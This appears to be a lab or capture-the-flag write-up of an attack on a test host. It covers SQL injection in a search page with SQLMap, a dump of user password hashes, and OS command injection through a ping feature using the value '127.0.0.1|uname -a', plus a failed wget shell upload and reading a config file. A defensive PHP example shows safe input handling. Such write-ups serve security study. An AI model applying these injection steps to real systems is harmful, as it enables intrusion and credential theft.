HOSTNAME:C3PO

IP:10.0.1.6

I found a SQLi in the search box

http://10.0.1.6/inc/search.php?query=xxx

By adding a single quote you’ll get the error message

I used SQLMap for a quick injection

As you see, 3 types of injection …

Anyway

select table_name FROM information_schema.tables where table_schema='vuln' [13]:
[*] adrbook
[*] eshop_goods
[*] eshop_orders
[*] flashgames
[*] log
[*] messages
[*] provozovny
[*] review_answers
[*] review_category
[*] review_questions
[*] statistics
[*] tickets
[*] users

select column_name from information_schema.columns where table_name='users' [10]:
[*] alterpass
[*] heslo
[*] id
[*] image
[*] isadmin
[*] login
[*] nick
[*] remail
[*] secondmail
[*] telefon

SELECT id,login,heslo,isadmin FROM users [13]:
[*] 1, karel, f196c5c9a5f002d14cfc2aafce74e39b, 0
[*] 2, jana, 3f858cf8cfd59f25010e71b6b5671428, 0
[*] 12, michal, 955db0b81ef1989b4a4dfeae8061a9a6, 0
[*] 13, Smolicek, 593a90797681ebd0b8c44315a4caf6ff, 0
[*] 14, jezinky, 4475987873e549d5208f8ad743fc3d07, 0
[*] 15, utocnik, 955db0b81ef1989b4a4dfeae8061a9a6, 0
[*] 18, uzivatel, 32250170a0dca92d53ec9624f336ca24, 0
[*] 21, admin, 32250170a0dca92d53ec9624f336ca24, 1
[*] 23, prochy, 32f055ca38a83ecb670b04edb50016ad, 0
[*] 24, prochy2, 2d8883c2d85b14fdcb44e3b3dc959535, 0
[*] 25, butterfly2, 1adbb3178591fd5bb0c248518f39bf6d, 0
[*] 26, test, 098f6bcd4621d373cade4e832627b4f6, 0
[*] 27, qyqouxmg, ae219661afe50f60419afbe08c45947d, 0

The only user that has admin privileges is admin himself:

[*] 21, admin, 32250170a0dca92d53ec9624f336ca24, 1

Login …

Go to this option

As we know, the ping option uses the “system” function or “exec” or …, so it’s clear that this box is vulnerable.

Let me check if it works first; let’s ping the local IP address 127.0.0.1.

Okay Cool

To run several commands you have to use | as a separator between them.

The PHP code must look something like this

So let’s try to send this request:

127.0.0.1|uname -a

Works fine.
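To show why the | separator works and how the ping feature should have been written, here is an added example (my own code, not the code running on C3PO, whose source is not shown on this page). It puts the unsafe concatenation pattern the walkthrough describes next to a hardened version that validates the host and quotes the argument; the function names and the "ping -c 3" command are assumptions.

```php
<?php
// Added example, not the target application's code.

// Unsafe pattern: user input is concatenated straight into the shell
// command line, so a value such as "127.0.0.1|uname -a" makes the shell
// run a second command after ping.
function build_ping_command_unsafe(string $host): string
{
    return "ping -c 3 " . $host;
}

// Hardened version: accept only a syntactically valid IP address, and
// still pass it through escapeshellarg() so shell metacharacters
// (| ; & ` $ and friends) lose their meaning even if validation is
// ever loosened later.
function build_ping_command_safe(string $host): ?string
{
    if (filter_var($host, FILTER_VALIDATE_IP) === false) {
        // "127.0.0.1|uname -a" is not an IP address, so it is rejected
        // before any shell is involved.
        return null;
    }
    return "ping -c 3 " . escapeshellarg($host);
}

// Walk both builders over the benign input and the walkthrough's payload.
$inputs = ["127.0.0.1", "127.0.0.1|uname -a"];
foreach ($inputs as $input) {
    printf("input : %s\n", $input);
    printf("unsafe: %s\n", build_ping_command_unsafe($input));
    $safe = build_ping_command_safe($input);
    printf("safe  : %s\n\n", $safe === null ? "REJECTED" : $safe);
}
```

On the defender side, the same logic applies to any feature that hands user input to system(), exec() or shell_exec(): validate against the expected shape first, then quote, and log rejected values so attempts like the one above show up in the application log.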

Whatever …

I tried to upload a PHP shell using “wget”, but nothing …

I read some PHP files using the “cat” command.

That led me to the config file named “base.php”.